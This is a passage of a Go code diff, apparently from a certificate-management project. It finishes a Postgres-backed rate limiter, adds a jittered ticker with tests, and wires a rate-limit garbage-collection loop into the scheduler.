||||||
|
return fmt.Errorf("ratelimit: ensure row: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 2: lock the row + read current state. lib/pq cannot scan a
|
||||||
|
// TIMESTAMPTZ[] column back into []time.Time directly: time.Time
|
||||||
|
// does not implement sql.Scanner, and pq.GenericArray's per-element
|
||||||
|
// scan path calls Scan() (not database/sql's convertAssign), so the
|
||||||
|
// inner Scan fails with
|
||||||
|
// "pq: scanning to time.Time is not implemented; only sql.Scanner".
|
||||||
|
// Workaround: ask Postgres to format each timestamp as a canonical
|
||||||
|
// ISO 8601 UTC string via to_char(... AT TIME ZONE 'UTC', ...), read
|
||||||
|
// the column as text[] via pq.StringArray (well-supported), and
|
||||||
|
// parse Go-side. The to_char format is fully deterministic (6-digit
|
||||||
|
// microseconds, "T" separator, "Z" suffix) regardless of the
|
||||||
|
// session's DateStyle / TimeZone settings.
|
||||||
|
const pgTimestampLayout = "2006-01-02T15:04:05.000000Z"
|
||||||
|
var tsStrings pq.StringArray
|
||||||
|
if err := tx.QueryRowContext(ctx, `
|
||||||
|
SELECT COALESCE(
|
||||||
|
ARRAY(
|
||||||
|
SELECT to_char(t AT TIME ZONE 'UTC', 'YYYY-MM-DD"T"HH24:MI:SS.US"Z"')
|
||||||
|
FROM unnest(timestamps) AS t
|
||||||
|
),
|
||||||
|
ARRAY[]::text[]
|
||||||
|
)
|
||||||
|
FROM rate_limit_buckets
|
||||||
|
WHERE bucket_key = $1
|
||||||
|
FOR UPDATE
|
||||||
|
`, key).Scan(&tsStrings); err != nil {
|
||||||
|
// Shouldn't happen — step 1 ensured the row exists. Treat
|
||||||
|
// the sql.ErrNoRows path as a no-op (be conservative; never
|
||||||
|
// over-limit on transient DB weirdness).
|
||||||
|
if errors.Is(err, sql.ErrNoRows) {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return fmt.Errorf("ratelimit: select-for-update: %w", err)
|
||||||
|
}
|
||||||
|
ts := make([]time.Time, 0, len(tsStrings))
|
||||||
|
for _, s := range tsStrings {
|
||||||
|
parsed, err := time.Parse(pgTimestampLayout, s)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: parse stored timestamp %q: %w", s, err)
|
||||||
|
}
|
||||||
|
ts = append(ts, parsed.UTC())
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 3: prune in Go via the shared helper. Same prune semantics
|
||||||
|
// as SlidingWindowLimiter — single source of truth.
|
||||||
|
cutoff := now.Add(-l.window)
|
||||||
|
pruned := pruneOlderThan(ts, cutoff)
|
||||||
|
|
||||||
|
// Step 4: decide.
|
||||||
|
rateLimited := len(pruned) >= l.maxN
|
||||||
|
if !rateLimited {
|
||||||
|
pruned = append(pruned, now)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 5: persist.
|
||||||
|
if _, err := tx.ExecContext(ctx, `
|
||||||
|
UPDATE rate_limit_buckets
|
||||||
|
SET timestamps = $2, updated_at = $3
|
||||||
|
WHERE bucket_key = $1
|
||||||
|
`, key, pq.Array(pruned), now); err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: update: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := tx.Commit(); err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: commit: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if rateLimited {
|
||||||
|
return ErrRateLimited
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Disabled reports whether the limiter is in opt-out mode (maxN <= 0).
|
||||||
|
// Mirrors SlidingWindowLimiter.Disabled() so handler-side gating +
|
||||||
|
// admin-endpoint observability can ask the same question of either
|
||||||
|
// backend.
|
||||||
|
func (l *PostgresSlidingWindowLimiter) Disabled() bool {
|
||||||
|
return l.disabled
|
||||||
|
}
|
||||||
@@ -0,0 +1,120 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package scheduler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"math/rand/v2"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// JitteredTicker is a bounded-jitter wrapper around time.Timer that
|
||||||
|
// fires on C once per interval ± jitterPct, with the jitter drawn
|
||||||
|
// fresh on every tick. The base interval is the same as a bare
|
||||||
|
// time.NewTicker; only the per-tick envelope changes. This preserves
|
||||||
|
// every loop's expected SLO (a renewal scan still runs ~once per
|
||||||
|
// hour) while breaking up the co-fire pattern that bare tickers
|
||||||
|
// produce when multiple loops share a nominal cadence.
|
||||||
|
//
|
||||||
|
// Stop must be called by the caller (typically via defer) to release
|
||||||
|
// the goroutine. After Stop, the C channel is closed.
|
||||||
|
//
|
||||||
|
// Phase 6 SCALE-M5 (2026-05-14) introduced this wrapper. Pre-Phase-6
|
||||||
|
// the 15 scheduler loops in scheduler.go each used a bare
|
||||||
|
// time.NewTicker(interval); when multiple loops shared a nominal
|
||||||
|
// cadence (e.g. several loops on a 1h interval), they co-fired at
|
||||||
|
// the same wall-clock boundary post-server-start, producing visible
|
||||||
|
// CPU + DB spikes at every hour boundary. The renewal scan + the
|
||||||
|
// agent health check + the digest preview all firing within
|
||||||
|
// milliseconds of each other on a freshly-booted server could
|
||||||
|
// saturate the connection pool until they completed.
|
||||||
|
type JitteredTicker struct {
|
||||||
|
// C is the channel a tick fires on. Read this in the loop's
|
||||||
|
// select{} the same way you'd read time.Ticker.C.
|
||||||
|
C chan time.Time
|
||||||
|
|
||||||
|
stopCh chan struct{}
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewJitteredTicker returns a ticker that fires on C every
|
||||||
|
// interval ± jitterPct (e.g. jitterPct=0.1 = ±10%). The first tick
|
||||||
|
// arrives one (jittered) interval after construction — same as
|
||||||
|
// time.NewTicker. jitterPct < 0 is treated as 0 (no jitter, equivalent
|
||||||
|
// to time.NewTicker). jitterPct ≥ 1 is clamped to 0.99 (avoid the
|
||||||
|
// degenerate "instant tick" case where the jitter consumes the
|
||||||
|
// entire interval).
|
||||||
|
//
|
||||||
|
// interval must be > 0. Callers passing 0 or negative get a panic
|
||||||
|
// from time.NewTimer, matching time.NewTicker's existing contract.
|
||||||
|
func NewJitteredTicker(interval time.Duration, jitterPct float64) *JitteredTicker {
|
||||||
|
if jitterPct < 0 {
|
||||||
|
jitterPct = 0
|
||||||
|
}
|
||||||
|
if jitterPct >= 1 {
|
||||||
|
jitterPct = 0.99
|
||||||
|
}
|
||||||
|
|
||||||
|
jt := &JitteredTicker{
|
||||||
|
C: make(chan time.Time, 1),
|
||||||
|
stopCh: make(chan struct{}),
|
||||||
|
}
|
||||||
|
|
||||||
|
go jt.run(interval, jitterPct)
|
||||||
|
return jt
|
||||||
|
}
|
||||||
|
|
||||||
|
// run owns the per-tick scheduling loop. The fresh-per-tick jitter
|
||||||
|
// draw prevents drift from compounding (vs. computing the jittered
|
||||||
|
// interval once and reusing it).
|
||||||
|
func (jt *JitteredTicker) run(interval time.Duration, jitterPct float64) {
|
||||||
|
defer close(jt.C)
|
||||||
|
|
||||||
|
for {
|
||||||
|
// Bounded-symmetric jitter around the interval. delta ∈
|
||||||
|
// [-jitterPct, +jitterPct) drawn fresh per tick.
|
||||||
|
delta := (rand.Float64()*2 - 1) * jitterPct
|
||||||
|
next := time.Duration(float64(interval) * (1 + delta))
|
||||||
|
// Floor at 1ns so we never feed a zero or negative
|
||||||
|
// duration into time.NewTimer; the jitterPct clamp above
|
||||||
|
// keeps next > 0 in normal use but a Float64 rounding
|
||||||
|
// edge case could otherwise produce 0.
|
||||||
|
if next < time.Nanosecond {
|
||||||
|
next = time.Nanosecond
|
||||||
|
}
|
||||||
|
|
||||||
|
timer := time.NewTimer(next)
|
||||||
|
select {
|
||||||
|
case t := <-timer.C:
|
||||||
|
select {
|
||||||
|
case jt.C <- t:
|
||||||
|
// emitted
|
||||||
|
case <-jt.stopCh:
|
||||||
|
return
|
||||||
|
}
|
||||||
|
case <-jt.stopCh:
|
||||||
|
if !timer.Stop() {
|
||||||
|
<-timer.C
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Stop releases the goroutine + closes C. Safe to call multiple
|
||||||
|
// times; subsequent calls are no-ops (the stopCh close is the
|
||||||
|
// only side effect, and re-closing a closed channel would panic,
|
||||||
|
// so we guard via a select+default).
|
||||||
|
func (jt *JitteredTicker) Stop() {
|
||||||
|
select {
|
||||||
|
case <-jt.stopCh:
|
||||||
|
// already closed; no-op
|
||||||
|
default:
|
||||||
|
close(jt.stopCh)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// DefaultSchedulerJitter is the jitter percentage applied to every
|
||||||
|
// scheduler-loop tick. ±10% is the industry-standard "spread but
|
||||||
|
// don't blur SLO" envelope used by Kubernetes controllers, AWS SDK
|
||||||
|
// retries, and Prometheus scrape intervals.
|
||||||
|
const DefaultSchedulerJitter = 0.10
|
||||||
@@ -0,0 +1,198 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package scheduler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"math"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-M5 contract pin (2026-05-14): JitteredTicker fires
|
||||||
|
// ~interval per tick with a bounded ±jitterPct envelope. The tests
|
||||||
|
// below are timing-sensitive but use generous tolerances + averaging
|
||||||
|
// across many ticks to stay stable under CI load.
|
||||||
|
|
||||||
|
func TestJitteredTicker_BoundedEnvelope(t *testing.T) {
|
||||||
|
const (
|
||||||
|
interval = 20 * time.Millisecond
|
||||||
|
jitterPct = 0.20 // ±20%
|
||||||
|
ticks = 30
|
||||||
|
)
|
||||||
|
|
||||||
|
jt := NewJitteredTicker(interval, jitterPct)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
last := time.Now()
|
||||||
|
for i := 0; i < ticks; i++ {
|
||||||
|
select {
|
||||||
|
case now := <-jt.C:
|
||||||
|
gap := now.Sub(last)
|
||||||
|
last = now
|
||||||
|
|
||||||
|
// Bounded envelope: every tick should fall within
|
||||||
|
// [interval × (1-jitter), interval × (1+jitter)] plus a
|
||||||
|
// generous scheduling-slop tolerance for the test
|
||||||
|
// runtime. The first tick is allowed wider slop since
|
||||||
|
// goroutine startup may eat into the first interval.
|
||||||
|
minGap := time.Duration(float64(interval) * (1 - jitterPct))
|
||||||
|
maxGap := time.Duration(float64(interval)*(1+jitterPct)) + 50*time.Millisecond
|
||||||
|
if i == 0 {
|
||||||
|
minGap = 0 // first tick can land arbitrarily fast under CI scheduling pressure
|
||||||
|
}
|
||||||
|
|
||||||
|
if gap < minGap || gap > maxGap {
|
||||||
|
t.Errorf("tick %d gap=%v outside envelope [%v, %v]", i, gap, minGap, maxGap)
|
||||||
|
}
|
||||||
|
case <-time.After(5 * interval):
|
||||||
|
t.Fatalf("tick %d timed out (>5×interval); JitteredTicker stuck", i)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_MeanCloseToInterval(t *testing.T) {
|
||||||
|
// Statistical pin: across many ticks the mean gap should be
|
||||||
|
// reasonably close to the nominal interval. Larger deviations
|
||||||
|
// indicate the jitter draw is biased (e.g. only producing
|
||||||
|
// positive deltas because of a sign bug — mean would drift to
|
||||||
|
// interval × 1.3 instead of staying near interval × 1.0).
|
||||||
|
//
|
||||||
|
// The 50ms interval + 50-tick sample is chosen so per-scheduler-
|
||||||
|
// quantum jitter (~1ms on Linux) is < 2% of the interval; the
|
||||||
|
// 30% bound below is generous enough for CI scheduling noise
|
||||||
|
// while still catching sign bugs (which would push mean drift
|
||||||
|
// past 30% trivially).
|
||||||
|
const (
|
||||||
|
interval = 50 * time.Millisecond
|
||||||
|
jitterPct = 0.30
|
||||||
|
ticks = 50
|
||||||
|
)
|
||||||
|
|
||||||
|
jt := NewJitteredTicker(interval, jitterPct)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
gaps := make([]time.Duration, 0, ticks)
|
||||||
|
last := time.Now()
|
||||||
|
|
||||||
|
for i := 0; i < ticks; i++ {
|
||||||
|
select {
|
||||||
|
case now := <-jt.C:
|
||||||
|
if i > 0 { // skip first gap (goroutine warmup)
|
||||||
|
gaps = append(gaps, now.Sub(last))
|
||||||
|
}
|
||||||
|
last = now
|
||||||
|
case <-time.After(5 * interval):
|
||||||
|
t.Fatalf("tick %d timed out", i)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var sum time.Duration
|
||||||
|
for _, g := range gaps {
|
||||||
|
sum += g
|
||||||
|
}
|
||||||
|
mean := sum / time.Duration(len(gaps))
|
||||||
|
|
||||||
|
// Sign-bug threshold: a healthy jittered ticker should produce
|
||||||
|
// mean ≈ interval (mean drift < 10%). A sign bug (e.g.
|
||||||
|
// always-positive jitter) shifts mean to interval × (1 +
|
||||||
|
// jitterPct / 2) = +15%. 30% bound catches that while
|
||||||
|
// tolerating CI scheduling noise + the (1 - x) vs (1 + x)
|
||||||
|
// asymmetry of multiplicative jitter.
|
||||||
|
driftPct := math.Abs(float64(mean-interval)) / float64(interval)
|
||||||
|
if driftPct > 0.30 {
|
||||||
|
t.Errorf("mean gap %v drifts %.1f%% from nominal interval %v (>30%% threshold)", mean, driftPct*100, interval)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_Stop_ReleasesGoroutine(t *testing.T) {
|
||||||
|
jt := NewJitteredTicker(50*time.Millisecond, 0.10)
|
||||||
|
|
||||||
|
// Stop immediately, before any tick fires.
|
||||||
|
jt.Stop()
|
||||||
|
|
||||||
|
// C should close within one tick interval. If it doesn't, the
|
||||||
|
// goroutine is stuck (which would leak in production).
|
||||||
|
select {
|
||||||
|
case _, ok := <-jt.C:
|
||||||
|
if ok {
|
||||||
|
// A tick fired before C closed — also acceptable, but
|
||||||
|
// drain it and re-check that close follows.
|
||||||
|
select {
|
||||||
|
case _, ok2 := <-jt.C:
|
||||||
|
if ok2 {
|
||||||
|
t.Errorf("JitteredTicker.C still emitting after Stop()")
|
||||||
|
}
|
||||||
|
case <-time.After(200 * time.Millisecond):
|
||||||
|
t.Errorf("JitteredTicker.C did not close after Stop()")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
case <-time.After(200 * time.Millisecond):
|
||||||
|
t.Errorf("JitteredTicker.C did not close within 200ms of Stop()")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_Stop_Idempotent(t *testing.T) {
|
||||||
|
jt := NewJitteredTicker(50*time.Millisecond, 0.10)
|
||||||
|
|
||||||
|
// Multiple Stop() calls must not panic.
|
||||||
|
jt.Stop()
|
||||||
|
jt.Stop()
|
||||||
|
jt.Stop()
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_ZeroJitter_BehavesLikeTicker(t *testing.T) {
|
||||||
|
// jitterPct=0 reduces to a deterministic ticker. The mean
|
||||||
|
// should be exactly the interval (modulo scheduling noise).
|
||||||
|
const (
|
||||||
|
interval = 20 * time.Millisecond
|
||||||
|
ticks = 10
|
||||||
|
)
|
||||||
|
|
||||||
|
jt := NewJitteredTicker(interval, 0)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
last := time.Now()
|
||||||
|
for i := 0; i < ticks; i++ {
|
||||||
|
select {
|
||||||
|
case now := <-jt.C:
|
||||||
|
gap := now.Sub(last)
|
||||||
|
last = now
|
||||||
|
// Allow generous slop for CI scheduling.
|
||||||
|
if i > 0 && (gap < interval/2 || gap > interval*3) {
|
||||||
|
t.Errorf("zero-jitter tick %d gap=%v far from interval=%v", i, gap, interval)
|
||||||
|
}
|
||||||
|
case <-time.After(5 * interval):
|
||||||
|
t.Fatalf("zero-jitter tick %d timed out", i)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_NegativeJitter_TreatedAsZero(t *testing.T) {
|
||||||
|
// Defensive: negative jitterPct should not produce
|
||||||
|
// negative-duration timers (which would panic time.NewTimer).
|
||||||
|
jt := NewJitteredTicker(10*time.Millisecond, -0.5)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
// Just confirm at least one tick fires without panic.
|
||||||
|
select {
|
||||||
|
case <-jt.C:
|
||||||
|
// ok
|
||||||
|
case <-time.After(100 * time.Millisecond):
|
||||||
|
t.Errorf("negative-jitter ticker produced no tick within 100ms")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_LargeJitter_ClampedBelowOne(t *testing.T) {
|
||||||
|
// Defensive: jitterPct≥1 would otherwise allow next=0 and panic
|
||||||
|
// time.NewTimer. Confirm the ticker still fires.
|
||||||
|
jt := NewJitteredTicker(10*time.Millisecond, 1.5)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
select {
|
||||||
|
case <-jt.C:
|
||||||
|
// ok
|
||||||
|
case <-time.After(100 * time.Millisecond):
|
||||||
|
t.Errorf("over-clamped-jitter ticker produced no tick within 100ms")
|
||||||
|
}
|
||||||
|
}
|
||||||
+105
-15
@@ -103,6 +103,21 @@ type BCLReplayGarbageCollector interface {
|
|||||||
SweepExpired(ctx context.Context, now time.Time) (int, error)
|
SweepExpired(ctx context.Context, now time.Time) (int, error)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// RateLimitGarbageCollector sweeps stale rows from the
|
||||||
|
// rate_limit_buckets table introduced in migration 000046. Phase 13
|
||||||
|
// Sprint 13.3 (ARCH-M1 closure completion) — wired only when
|
||||||
|
// CERTCTL_RATE_LIMIT_BACKEND=postgres. Concrete impl is
|
||||||
|
// *ratelimit.PostgresGC. Mirrors the ACMEGarbageCollector +
|
||||||
|
// SessionGarbageCollector contracts so the scheduler reuses the same
|
||||||
|
// atomic.Bool + WithTimeout + ticker pattern as the existing GC loops.
|
||||||
|
//
|
||||||
|
// Returns the row count to surface via observability logs (matches
|
||||||
|
// SessionGarbageCollector's shape — the operator wants to see
|
||||||
|
// "how many buckets did the sweep delete" in steady-state monitoring).
|
||||||
|
type RateLimitGarbageCollector interface {
|
||||||
|
GarbageCollect(ctx context.Context) (int64, error)
|
||||||
|
}
|
||||||
|
|
||||||
// JobReaperService defines the interface for job timeout reaping used by the scheduler.
|
// JobReaperService defines the interface for job timeout reaping used by the scheduler.
|
||||||
type JobReaperService interface {
|
type JobReaperService interface {
|
||||||
ReapTimedOutJobs(ctx context.Context, csrTTL, approvalTTL time.Duration) error
|
ReapTimedOutJobs(ctx context.Context, csrTTL, approvalTTL time.Duration) error
|
||||||
@@ -130,6 +145,7 @@ type Scheduler struct {
|
|||||||
acmeGC ACMEGarbageCollector
|
acmeGC ACMEGarbageCollector
|
||||||
sessionGC SessionGarbageCollector
|
sessionGC SessionGarbageCollector
|
||||||
bclReplayGC BCLReplayGarbageCollector
|
bclReplayGC BCLReplayGarbageCollector
|
||||||
|
rateLimitGC RateLimitGarbageCollector
|
||||||
jobReaper JobReaperService
|
jobReaper JobReaperService
|
||||||
logger *slog.Logger
|
logger *slog.Logger
|
||||||
|
|
||||||
@@ -149,6 +165,7 @@ type Scheduler struct {
|
|||||||
jobTimeoutInterval time.Duration
|
jobTimeoutInterval time.Duration
|
||||||
acmeGCInterval time.Duration
|
acmeGCInterval time.Duration
|
||||||
sessionGCInterval time.Duration
|
sessionGCInterval time.Duration
|
||||||
|
rateLimitGCInterval time.Duration
|
||||||
// agentOfflineJobTTL: per-tick threshold for reaping Running jobs whose
|
// agentOfflineJobTTL: per-tick threshold for reaping Running jobs whose
|
||||||
// owning agent has been silent. Bundle C / Audit M-016. Defaults below.
|
// owning agent has been silent. Bundle C / Audit M-016. Defaults below.
|
||||||
agentOfflineJobTTL time.Duration
|
agentOfflineJobTTL time.Duration
|
||||||
@@ -171,6 +188,7 @@ type Scheduler struct {
|
|||||||
jobTimeoutRunning atomic.Bool
|
jobTimeoutRunning atomic.Bool
|
||||||
acmeGCRunning atomic.Bool
|
acmeGCRunning atomic.Bool
|
||||||
sessionGCRunning atomic.Bool
|
sessionGCRunning atomic.Bool
|
||||||
|
rateLimitGCRunning atomic.Bool
|
||||||
|
|
||||||
// Graceful shutdown: wait for in-flight work to complete
|
// Graceful shutdown: wait for in-flight work to complete
|
||||||
wg sync.WaitGroup
|
wg sync.WaitGroup
|
||||||
@@ -209,6 +227,7 @@ func NewScheduler(
|
|||||||
jobTimeoutInterval: 10 * time.Minute,
|
jobTimeoutInterval: 10 * time.Minute,
|
||||||
acmeGCInterval: 1 * time.Minute,
|
acmeGCInterval: 1 * time.Minute,
|
||||||
sessionGCInterval: 1 * time.Hour,
|
sessionGCInterval: 1 * time.Hour,
|
||||||
|
rateLimitGCInterval: 5 * time.Minute,
|
||||||
// 5 minutes is 5×agentHealthCheckInterval default of 1m; an agent
|
// 5 minutes is 5×agentHealthCheckInterval default of 1m; an agent
|
||||||
// must miss multiple heartbeats before its in-flight jobs are reaped.
|
// must miss multiple heartbeats before its in-flight jobs are reaped.
|
||||||
agentOfflineJobTTL: 5 * time.Minute,
|
agentOfflineJobTTL: 5 * time.Minute,
|
||||||
@@ -365,6 +384,29 @@ func (s *Scheduler) SetSessionGCInterval(d time.Duration) {
|
|||||||
s.sessionGCInterval = d
|
s.sessionGCInterval = d
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SetRateLimitGarbageCollector wires the Phase 13 Sprint 13.3 rate-
|
||||||
|
// limit bucket GC. Optional; nil disables the loop (which is the
|
||||||
|
// correct behavior when CERTCTL_RATE_LIMIT_BACKEND=memory — the
|
||||||
|
// in-memory backend's prune-on-Allow path keeps buckets short-lived
|
||||||
|
// without a separate sweep).
|
||||||
|
//
|
||||||
|
// Concrete impl is *ratelimit.PostgresGC, constructed in
|
||||||
|
// cmd/server/main.go only when the postgres backend is selected.
|
||||||
|
func (s *Scheduler) SetRateLimitGarbageCollector(gc RateLimitGarbageCollector) {
|
||||||
|
s.rateLimitGC = gc
|
||||||
|
}
|
||||||
|
|
||||||
|
// SetRateLimitGCInterval configures the interval at which the rate-
|
||||||
|
// limit GC sweep runs. Default 5m. Wire:
|
||||||
|
// CERTCTL_RATE_LIMIT_JANITOR_INTERVAL. Zero or negative values are
|
||||||
|
// ignored.
|
||||||
|
func (s *Scheduler) SetRateLimitGCInterval(d time.Duration) {
|
||||||
|
if d <= 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
s.rateLimitGCInterval = d
|
||||||
|
}
|
||||||
|
|
||||||
// SetAgentOfflineJobTTL sets the threshold past which a Running job whose
|
// SetAgentOfflineJobTTL sets the threshold past which a Running job whose
|
||||||
// owning agent has gone silent is reaped to Failed. Bundle C / Audit M-016.
|
// owning agent has gone silent is reaped to Failed. Bundle C / Audit M-016.
|
||||||
// Zero or negative values are ignored (the default of 5 minutes is kept).
|
// Zero or negative values are ignored (the default of 5 minutes is kept).
|
||||||
@@ -426,6 +468,9 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
|||||||
if s.sessionGC != nil {
|
if s.sessionGC != nil {
|
||||||
loopCount++
|
loopCount++
|
||||||
}
|
}
|
||||||
|
if s.rateLimitGC != nil {
|
||||||
|
loopCount++
|
||||||
|
}
|
||||||
s.wg.Add(loopCount)
|
s.wg.Add(loopCount)
|
||||||
|
|
||||||
go func() { defer s.wg.Done(); s.renewalCheckLoop(ctx) }()
|
go func() { defer s.wg.Done(); s.renewalCheckLoop(ctx) }()
|
||||||
@@ -457,6 +502,9 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
|||||||
if s.sessionGC != nil {
|
if s.sessionGC != nil {
|
||||||
go func() { defer s.wg.Done(); s.sessionGCLoop(ctx) }()
|
go func() { defer s.wg.Done(); s.sessionGCLoop(ctx) }()
|
||||||
}
|
}
|
||||||
|
if s.rateLimitGC != nil {
|
||||||
|
go func() { defer s.wg.Done(); s.rateLimitGCLoop(ctx) }()
|
||||||
|
}
|
||||||
|
|
||||||
// Signal that all loops are launched
|
// Signal that all loops are launched
|
||||||
close(startedChan)
|
close(startedChan)
|
||||||
@@ -473,7 +521,7 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) renewalCheckLoop(ctx context.Context) {
|
func (s *Scheduler) renewalCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.renewalCheckInterval)
|
ticker := NewJitteredTicker(s.renewalCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -522,7 +570,7 @@ func (s *Scheduler) runRenewalCheck(ctx context.Context) {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous job is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous job is still running.
|
||||||
func (s *Scheduler) jobProcessorLoop(ctx context.Context) {
|
func (s *Scheduler) jobProcessorLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.jobProcessorInterval)
|
ticker := NewJitteredTicker(s.jobProcessorInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -573,7 +621,7 @@ func (s *Scheduler) runJobProcessor(ctx context.Context) {
|
|||||||
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
||||||
// is still running.
|
// is still running.
|
||||||
func (s *Scheduler) jobRetryLoop(ctx context.Context) {
|
func (s *Scheduler) jobRetryLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.jobRetryInterval)
|
ticker := NewJitteredTicker(s.jobRetryInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -628,7 +676,7 @@ func (s *Scheduler) runJobRetry(ctx context.Context) {
|
|||||||
// retry loop then auto-promotes eligible Failed jobs back to Pending. Closes
|
// retry loop then auto-promotes eligible Failed jobs back to Pending. Closes
|
||||||
// coverage gap I-003. Uses atomic.Bool to prevent duplicate execution.
|
// coverage gap I-003. Uses atomic.Bool to prevent duplicate execution.
|
||||||
func (s *Scheduler) jobTimeoutLoop(ctx context.Context) {
|
func (s *Scheduler) jobTimeoutLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.jobTimeoutInterval)
|
ticker := NewJitteredTicker(s.jobTimeoutInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -706,7 +754,7 @@ func (s *Scheduler) runJobTimeout(ctx context.Context) {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) {
|
func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.agentHealthCheckInterval)
|
ticker := NewJitteredTicker(s.agentHealthCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -754,7 +802,7 @@ func (s *Scheduler) runAgentHealthCheck(ctx context.Context) {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous process is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous process is still running.
|
||||||
func (s *Scheduler) notificationProcessLoop(ctx context.Context) {
|
func (s *Scheduler) notificationProcessLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.notificationProcessInterval)
|
ticker := NewJitteredTicker(s.notificationProcessInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -806,7 +854,7 @@ func (s *Scheduler) runNotificationProcess(ctx context.Context) {
|
|||||||
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
||||||
// is still running. Mirrors the I-001 jobRetryLoop topology byte-for-byte.
|
// is still running. Mirrors the I-001 jobRetryLoop topology byte-for-byte.
|
||||||
func (s *Scheduler) notificationRetryLoop(ctx context.Context) {
|
func (s *Scheduler) notificationRetryLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.notificationRetryInterval)
|
ticker := NewJitteredTicker(s.notificationRetryInterval, DefaultSchedulerJitter)
|
||||||
